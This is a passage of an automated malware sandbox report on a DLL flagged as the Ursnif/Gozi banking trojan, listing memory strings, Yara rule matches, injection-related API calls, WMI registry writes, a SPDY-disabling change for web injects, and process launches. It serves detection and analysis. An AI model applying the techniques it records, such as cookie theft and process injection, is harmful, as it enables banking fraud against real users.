Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: msapplication.xml5.5.dr String found in binary or memory: http://www.twitter.com/
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: msapplication.xml6.5.dr String found in binary or memory: http://www.wikipedia.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: msapplication.xml7.5.dr String found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 0000001B.00000002.1017567329.000001FE0020F000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001B.00000003.459766982.000001FE6E879000.00000004.00000001.sdmp String found in binary or memory: https://go.microsoft.co
Source: u.dll String found in binary or memory: https://sectigo.com/CPS0D

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000023.00000003.439971229.00000000032B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264849176.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.430559712.0000016753ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.265016574.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.441197117.0000000000760000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.424976017.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264996879.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.442622073.0000000000E5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264981928.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264937630.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264962927.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.415711591.000001FE6ECE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.365389043.000000000314B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264883411.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.265008203.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6872, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5308, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5388, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY

E-Banking Fraud:

barindex
Detected Gozi e-Banking trojan
Source: C:\Windows\System32\loaddll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 0_2_00765ECA
Source: C:\Windows\System32\loaddll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 0_2_00765ECA
Source: C:\Windows\System32\loaddll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 0_2_00765ECA
Yara detected Ursnif
Source: Yara match File source: 00000023.00000003.439971229.00000000032B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264849176.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.430559712.0000016753ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.265016574.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.441197117.0000000000760000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.424976017.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264996879.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.442622073.0000000000E5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264981928.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264937630.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264962927.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.415711591.000001FE6ECE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.365389043.000000000314B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264883411.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.265008203.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6872, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5308, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5388, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000023.00000003.439971229.00000000032B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000026.00000003.430559712.0000016753ED0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000026.00000002.442622073.0000000000E5E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000001B.00000003.415711591.000001FE6ECE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001C22 GetProcAddress,NtCreateSection,memset, 0_2_10001C22
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001AD1 NtMapViewOfSection, 0_2_10001AD1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001252 GetLastError,NtClose, 0_2_10001252
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100023C5 NtQueryVirtualMemory, 0_2_100023C5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076A027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 0_2_0076A027
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076E010 GetProcAddress,NtCreateSection,memset, 0_2_0076E010
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00777AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 0_2_00777AFF
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076ACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_0076ACD5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00776CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 0_2_00776CBC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0077AC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 0_2_0077AC94
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0077CD7A NtQueryInformationProcess, 0_2_0077CD7A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00777579 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset, 0_2_00777579
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00769DAC NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_00769DAC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00767E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 0_2_00767E14
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007637E7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_007637E7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007847A1 NtMapViewOfSection, 0_2_007847A1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00767878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 0_2_00767878
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007740A7 memset,NtQueryInformationProcess, 0_2_007740A7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0078298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 0_2_0078298D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076AA15 NtQuerySystemInformation,RtlNtStatusToDosError, 0_2_0076AA15
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00774C67 NtGetContextThread,RtlNtStatusToDosError, 0_2_00774C67
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0077956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 0_2_0077956E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007645FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 0_2_007645FF
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00771606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_00771606
Source: C:\Windows\System32\control.exe Code function: 38_2_00E3F0D0 NtReadVirtualMemory, 38_2_00E3F0D0
Source: C:\Windows\System32\control.exe Code function: 38_2_00E440A4 NtQueryInformationProcess, 38_2_00E440A4
Source: C:\Windows\System32\control.exe Code function: 38_2_00E31084 NtQueryInformationProcess, 38_2_00E31084
Source: C:\Windows\System32\control.exe Code function: 38_2_00E4D9EC NtQueryInformationToken,NtQueryInformationToken,NtClose, 38_2_00E4D9EC
Source: C:\Windows\System32\control.exe Code function: 38_2_00E269DC RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 38_2_00E269DC
Source: C:\Windows\System32\control.exe Code function: 38_2_00E2B980 NtMapViewOfSection, 38_2_00E2B980
Source: C:\Windows\System32\control.exe Code function: 38_2_00E21148 NtCreateSection, 38_2_00E21148
Source: C:\Windows\System32\control.exe Code function: 38_2_00E41DF4 NtWriteVirtualMemory, 38_2_00E41DF4
Source: C:\Windows\System32\control.exe Code function: 38_2_00E27DA0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 38_2_00E27DA0
Source: C:\Windows\System32\control.exe Code function: 38_2_00E446EC NtAllocateVirtualMemory, 38_2_00E446EC
Source: C:\Windows\System32\control.exe Code function: 38_2_00E61002 NtProtectVirtualMemory,NtProtectVirtualMemory, 38_2_00E61002
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00781CB8 CreateProcessAsUserA, 0_2_00781CB8
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100021A4 0_2_100021A4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0077D057 0_2_0077D057
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076D0DC 0_2_0076D0DC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00787188 0_2_00787188
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007662FA 0_2_007662FA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00778BF3 0_2_00778BF3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076E384 0_2_0076E384
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00764C03 0_2_00764C03
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0077ED4B 0_2_0077ED4B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00783EAF 0_2_00783EAF
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0077D7BD 0_2_0077D7BD
Source: C:\Windows\System32\control.exe Code function: 38_2_00E269DC 38_2_00E269DC
Source: C:\Windows\System32\control.exe Code function: 38_2_00E44B78 38_2_00E44B78
Source: C:\Windows\System32\control.exe Code function: 38_2_00E45428 38_2_00E45428
Source: C:\Windows\System32\control.exe Code function: 38_2_00E3A0F0 38_2_00E3A0F0
Source: C:\Windows\System32\control.exe Code function: 38_2_00E4A074 38_2_00E4A074
Source: C:\Windows\System32\control.exe Code function: 38_2_00E39850 38_2_00E39850
Source: C:\Windows\System32\control.exe Code function: 38_2_00E3782C 38_2_00E3782C
Source: C:\Windows\System32\control.exe Code function: 38_2_00E3B814 38_2_00E3B814
Source: C:\Windows\System32\control.exe Code function: 38_2_00E2B9E8 38_2_00E2B9E8
Source: C:\Windows\System32\control.exe Code function: 38_2_00E419FC 38_2_00E419FC
Source: C:\Windows\System32\control.exe Code function: 38_2_00E4A9FC 38_2_00E4A9FC
Source: C:\Windows\System32\control.exe Code function: 38_2_00E399F8 38_2_00E399F8
Source: C:\Windows\System32\control.exe Code function: 38_2_00E249C4 38_2_00E249C4
Source: C:\Windows\System32\control.exe Code function: 38_2_00E2596C 38_2_00E2596C
Source: C:\Windows\System32\control.exe Code function: 38_2_00E3D92C 38_2_00E3D92C
Source: C:\Windows\System32\control.exe Code function: 38_2_00E5027C 38_2_00E5027C
Source: C:\Windows\System32\control.exe Code function: 38_2_00E4EA40 38_2_00E4EA40
Source: C:\Windows\System32\control.exe Code function: 38_2_00E46250 38_2_00E46250
Source: C:\Windows\System32\control.exe Code function: 38_2_00E4E220 38_2_00E4E220
Source: C:\Windows\System32\control.exe Code function: 38_2_00E3AA28 38_2_00E3AA28
Source: C:\Windows\System32\control.exe Code function: 38_2_00E22A34 38_2_00E22A34
Source: C:\Windows\System32\control.exe Code function: 38_2_00E29A34 38_2_00E29A34
Source: C:\Windows\System32\control.exe Code function: 38_2_00E2DA3C 38_2_00E2DA3C
Source: C:\Windows\System32\control.exe Code function: 38_2_00E37218 38_2_00E37218
Source: C:\Windows\System32\control.exe Code function: 38_2_00E403EC 38_2_00E403EC
Source: C:\Windows\System32\control.exe Code function: 38_2_00E493FC 38_2_00E493FC
Source: C:\Windows\System32\control.exe Code function: 38_2_00E4A3B2 38_2_00E4A3B2
Source: C:\Windows\System32\control.exe Code function: 38_2_00E3B378 38_2_00E3B378
Source: C:\Windows\System32\control.exe Code function: 38_2_00E27B44 38_2_00E27B44
Source: C:\Windows\System32\control.exe Code function: 38_2_00E36B00 38_2_00E36B00
Source: C:\Windows\System32\control.exe Code function: 38_2_00E2ECE0 38_2_00E2ECE0
Source: C:\Windows\System32\control.exe Code function: 38_2_00E2FCA0 38_2_00E2FCA0
Source: C:\Windows\System32\control.exe Code function: 38_2_00E31C0C 38_2_00E31C0C
Source: C:\Windows\System32\control.exe Code function: 38_2_00E38DD0 38_2_00E38DD0
Source: C:\Windows\System32\control.exe Code function: 38_2_00E265D8 38_2_00E265D8
Source: C:\Windows\System32\control.exe Code function: 38_2_00E375D8 38_2_00E375D8
Source: C:\Windows\System32\control.exe Code function: 38_2_00E325A4 38_2_00E325A4
Source: C:\Windows\System32\control.exe Code function: 38_2_00E25DA8 38_2_00E25DA8
Source: C:\Windows\System32\control.exe Code function: 38_2_00E4C560 38_2_00E4C560
Source: C:\Windows\System32\control.exe Code function: 38_2_00E47D44 38_2_00E47D44
Source: C:\Windows\System32\control.exe Code function: 38_2_00E36528 38_2_00E36528
Source: C:\Windows\System32\control.exe Code function: 38_2_00E296D8 38_2_00E296D8
Source: C:\Windows\System32\control.exe Code function: 38_2_00E3CE90 38_2_00E3CE90
Source: C:\Windows\System32\control.exe Code function: 38_2_00E21600 38_2_00E21600
Source: C:\Windows\System32\control.exe Code function: 38_2_00E50614 38_2_00E50614
Source: C:\Windows\System32\control.exe Code function: 38_2_00E2DF58 38_2_00E2DF58
PE / OLE file has an invalid certificate
Source: u.dll Static PE information: invalid certificate
PE file does not import any functions
Source: 0oy3xkhb.dll.32.dr Static PE information: No import functions for PE file found
Source: v0ewugxm.dll.29.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Uses 32bit PE files
Source: u.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Yara signature match
Source: 00000023.00000003.439971229.00000000032B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000026.00000003.430559712.0000016753ED0000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000026.00000002.442622073.0000000000E5E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000001B.00000003.415711591.000001FE6ECE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: classification engine Classification label: mal100.bank.troj.evad.winDLL@27/55@9/1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076A7B1 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle, 0_2_0076A7B1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{22C6B3FB-198F-A42D-B376-5D18970AE1CC}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{12E2C3F3-499A-14DF-6366-8D8847FA113C}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{7E59EF8E-C5B2-6085-3F92-C994E3E60D08}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_01
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DFAE8637EBB409A380.TMP Jump to behavior
Source: u.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: u.dll Metadefender: Detection: 37%
Source: u.dll ReversingLabs: Detection: 62%
Source: loaddll32.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\u.dll'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:464 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5508 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5508 CREDAT:17422 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5508 CREDAT:82962 /prefetch:2
